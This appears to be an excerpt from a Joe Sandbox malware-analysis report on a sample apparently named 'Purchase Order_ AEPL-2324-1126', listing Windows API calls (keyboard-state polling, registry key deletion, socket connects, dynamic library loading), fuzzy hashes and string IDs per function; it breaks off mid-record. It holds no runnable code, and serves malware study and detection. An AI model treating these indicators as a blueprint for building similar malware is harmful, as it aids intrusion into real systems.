                                  • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                  APIs
                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                  • IsMenu.USER32(?), ref: 0044854D
                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                  • DrawMenuBar.USER32 ref: 004485AF
                                  Strings
                                  Similarity
                                  • API ID: Menu$Item$DrawInfoInsert
                                  • String ID: 0
                                  • API String ID: 3076010158-4108050209
                                  • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                  • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                  • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                  • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                  APIs
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                  • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  Strings
                                  Similarity
                                  • API ID: MessageSend$_memmove_wcslen
                                  • String ID: ComboBox$ListBox
                                  • API String ID: 1589278365-1403004172
                                  • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                  • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                  • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                  • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: Handle
                                  • String ID: nul
                                  • API String ID: 2519475695-2873401336
                                  • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                  • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                  • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                  • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                  APIs
                                  • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                  Strings
                                  Similarity
                                  • API ID: Handle
                                  • String ID: nul
                                  • API String ID: 2519475695-2873401336
                                  • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                  • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                  • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                  • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                  Strings
                                  Similarity
                                  • API ID:
                                  • String ID: SysAnimate32
                                  • API String ID: 0-1011021900
                                  • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                  • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                  • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                  • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                  APIs
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                    • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                    • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                    • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                    • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                  • GetFocus.USER32 ref: 0046157B
                                    • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                    • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                  • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                  • 74286A70.USER32(?,Function_00045B98,?), ref: 004615EF
                                  • __swprintf.LIBCMT ref: 00461608
                                  Strings
                                  Similarity
                                  • API ID: Thread$Parent$74286AttachClassCurrentFocusInputMessageNameProcessSendTimeoutWindow__swprintf_memmove_wcslen
                                  • String ID: %s%d
                                  • API String ID: 3220401950-1110647743
                                  • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                  • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                  • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                  • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                  • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                  • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                  • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                  APIs
                                  • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                  • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                  Similarity
                                  • API ID: Process$CloseCountersCurrentHandleOpen
                                  • String ID:
                                  • API String ID: 3488606520-0
                                  • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                  • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                  • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                  • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                  APIs
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                  Similarity
                                  • API ID: ConnectRegistry_memmove_wcslen
                                  • String ID:
                                  • API String ID: 15295421-0
                                  • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                  • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                  • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                  • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                  APIs
                                  • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                  • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                  • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                  Similarity
                                  • API ID: AddressProc$Library$FreeLoad
                                  • String ID:
                                  • API String ID: 2449869053-0
                                  • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                  • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                  • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                  • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                  APIs
                                  • GetCursorPos.USER32(?), ref: 004563A6
                                  • ScreenToClient.USER32(?,?), ref: 004563C3
                                  • GetAsyncKeyState.USER32(?), ref: 00456400
                                  • GetAsyncKeyState.USER32(?), ref: 00456410
                                  • 742845F0.USER32(?,000000F0), ref: 00456466
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: AsyncState$742845ClientCursorScreen
                                  • String ID:
                                  • API String ID: 2494728105-0
                                  • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                  • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                  • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                  • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                  APIs
                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                  • Sleep.KERNEL32(0000000A), ref: 0047D455
                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Interlocked$DecrementIncrement$Sleep
                                  • String ID:
                                  • API String ID: 327565842-0
                                  • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                  • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                  • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                  • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                  APIs
                                  • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                  • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                  • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                  • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: PrivateProfile$SectionWrite$String
                                  • String ID:
                                  • API String ID: 2832842796-0
                                  • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                  • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                  • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                  • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                  APIs
                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                  • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Enum$CloseDeleteOpen
                                  • String ID:
                                  • API String ID: 2095303065-0
                                  • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                  • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                  • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                  • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                  APIs
                                  • GetWindowRect.USER32(?,?), ref: 00436A24
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: RectWindow
                                  • String ID:
                                  • API String ID: 861336768-0
                                  • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                  • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                  • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                  • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                  APIs
                                  • SendMessageW.USER32 ref: 00449598
                                    • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                  • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                  • _wcslen.LIBCMT ref: 0044960D
                                  • _wcslen.LIBCMT ref: 0044961A
                                  • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$_wcslen$_wcspbrk
                                  • String ID:
                                  • API String ID: 1856069659-0
                                  • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                  • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                  • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                  • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                  APIs
                                  • GetWindowRect.USER32(?,?), ref: 00447C5D
                                  • ScreenToClient.USER32(?,?), ref: 00447C7B
                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                  • EndPaint.USER32(?,?), ref: 00447D13
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ClientPaintRectRectangleScreenViewportWindow
                                  • String ID:
                                  • API String ID: 659298297-0
                                  • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                  • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                  • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                  • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                  APIs
                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                    • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                    • Part of subcall function 00440D98: 742845F0.USER32(?,000000F0,?,?,000000F0,00000000,00000000), ref: 00440DFA
                                    • Part of subcall function 00440D98: 742845F0.USER32(?,000000F0,?,?,000000F0,00000000,00000000), ref: 00440E3A
                                    • Part of subcall function 00440D98: SendMessageW.USER32(019E1CA8,000000F1,00000000,00000000), ref: 00440E6E
                                    • Part of subcall function 00440D98: SendMessageW.USER32(019E1CA8,000000F1,00000001,00000000), ref: 00440E9A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window$EnableMessageSend$742845Show
                                  • String ID:
                                  • API String ID: 962000629-0
                                  • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                  • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                  • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                  • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                  • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                  • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                  • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                  APIs
                                  • IsWindowVisible.USER32(?), ref: 00445879
                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                  • _wcslen.LIBCMT ref: 004458FB
                                  • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                  • String ID:
                                  • API String ID: 3087257052-0
                                  • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                  • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                  • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                  • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                  APIs
                                    • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                  • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                  • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                  • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                  • String ID:
                                  • API String ID: 245547762-0
                                  • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
